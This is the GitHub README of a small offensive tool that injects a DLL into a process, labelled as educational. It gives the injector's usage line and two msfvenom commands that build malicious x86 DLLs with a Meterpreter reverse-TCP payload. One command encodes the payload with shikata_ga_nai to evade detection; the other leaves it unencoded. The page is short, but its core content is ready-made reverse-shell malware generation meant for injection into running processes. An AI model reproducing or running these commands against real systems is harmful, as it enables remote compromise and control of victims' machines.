Skip to content

simple DLL Injection; made for educational purposes

Notifications You must be signed in to change notification settings

rthxr/DLL-Injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

DLL-Injection

simple DLL Injection; made for educational purposes

Usage: injection.exe <PID> <DLLPath>

crafiting a x86 malicious DLL with sgnx86 enconding

msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=443 -a x86 --platform windows -b '\x00' -e x86/shikata_ga_nai -f dll -o dll_sgnx86.dll

alt text

crafiting a x86 malicious DLL without enconding

msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=443 -a x86 --platform windows -f dll -o dll_x86.dll

alt text

About

simple DLL Injection; made for educational purposes

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages